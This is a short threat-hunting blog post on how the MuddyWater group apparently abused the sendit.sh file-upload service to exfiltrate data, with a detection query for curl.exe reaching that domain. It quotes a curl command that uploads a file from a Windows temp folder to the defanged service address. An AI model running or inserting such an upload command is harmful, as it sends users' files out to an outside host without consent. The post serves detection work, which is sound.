392. MuddyWater Abuses Sendit for Data Exfiltration
Hello everyone!
I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002).
According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line:
curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh
As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL:
event_type: "dnsreqwin"
AND
dns_rname: "sendit.sh"
AND
proc_file_path: "curl.exe"
See you soon!

Comments
Post a Comment